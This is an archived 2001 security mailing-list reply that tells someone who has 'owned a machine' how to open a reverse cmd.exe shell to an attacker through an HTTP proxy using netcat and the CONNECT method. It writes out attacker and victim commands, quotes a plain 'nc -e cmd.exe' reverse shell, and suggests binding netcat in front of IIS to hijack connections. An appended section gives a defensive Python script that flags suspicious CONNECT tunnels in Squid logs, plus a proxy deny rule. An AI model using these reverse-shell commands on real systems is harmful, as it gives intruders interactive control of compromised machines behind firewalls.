Hi,

> Does anybody know any solution based on the remote shell in Win32
> machines using Reverse Telnet thru Proxies?
> The proxy only permits HTTP 80/8080.

I think your situation is this: You have owned a machine which is behind a firewall, and it only allows connections out via a proxy, so simple reverse telnet techniques such as 'nc.exe -e cmd.exe myip myport' fail.

You could try something like this:

Attacker: netcat -v -l -p 80
Victim: echo CONNECT attacker:80 HTTP/1.1 | netcat proxyserver 8080 -e cmd.exe

The HTTP/1.1 CONNECT method is the only way I can see you getting a nice interactive command prompt if ports 80/8080 outbound are all you have to play with.

Remember that netcat can bind in FRONT of the existing IIS process. If you spawn a netcat listener on 80, 443, 21, etc.. with the '-l' (listen once) option, the next person to connect to that port will get the netcat listener. Any subsequent connections will see the IIS service.

cheers
.jm

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
This archive was generated by hypermail 2b30 : Fri Oct 19 2001 - 11:39:01 PDT
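
The CONNECT-to-port-80 tunnel described in the post leaves a distinctive record on the proxy. The following is an added example, not part of the original post: it scans proxy logs for CONNECT requests to ports outside an allowlist. It assumes Squid's native access.log field layout and an allowlist of port 443 only; the function names and the sample log lines are constructed for illustration.

```python
# Added example: flag HTTP CONNECT tunnels to ports outside an allowlist.
ALLOWED_CONNECT_PORTS = {443}  # assumption: only TLS is a legitimate CONNECT target

# Constructed sample lines (documentation IP ranges), Squid native layout:
# time elapsed_ms client action/status bytes method target ident hierarchy type
SAMPLE_LOG = """\
1003516741.101    212 10.0.0.15 TCP_MISS/200 4312 GET http://example.com/ - DIRECT/192.0.2.10 text/html
1003516745.870  91542 10.0.0.23 TCP_MISS/200 18233 CONNECT 203.0.113.7:80 - DIRECT/203.0.113.7 -
1003516750.002   1530 10.0.0.15 TCP_MISS/200 9120 CONNECT shop.example.com:443 - DIRECT/192.0.2.20 -
1003516752.440      3 10.0.0.23 TCP_DENIED/403 1402 CONNECT 203.0.113.7:21 - NONE/- text/html
garbage line that should be skipped
"""

def split_target(target):
    """Return (host, port) from a CONNECT target such as host:port or [v6]:port."""
    host, sep, port = target.rpartition(":")
    if not sep or not host or not port.isdigit():
        return None  # malformed target, nothing to judge
    return host.strip("[]"), int(port)

def find_suspicious_connects(log_text, allowed_ports=ALLOWED_CONNECT_PORTS):
    """List CONNECT requests whose destination port is not allowlisted."""
    findings = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 7 or fields[5] != "CONNECT":
            continue  # not a CONNECT record, or a truncated line
        parsed = split_target(fields[6])
        if parsed is None or parsed[1] in allowed_ports:
            continue
        _, _, status = fields[3].partition("/")
        findings.append({
            "client": fields[2],
            "host": parsed[0],
            "port": parsed[1],
            # A 2xx status means the proxy opened the tunnel.
            "established": status.startswith("2"),
            # Long-lived tunnels are typical of interactive sessions.
            "elapsed_ms": int(fields[1]) if fields[1].isdigit() else None,
        })
    return findings

if __name__ == "__main__":
    for f in find_suspicious_connects(SAMPLE_LOG):
        state = "ESTABLISHED" if f["established"] else "blocked"
        print(f"{f['client']} -> {f['host']}:{f['port']} {state} ({f['elapsed_ms']} ms)")
```

Blocking at the proxy is the stronger control: Squid's stock configuration does this with `http_access deny CONNECT !SSL_ports`.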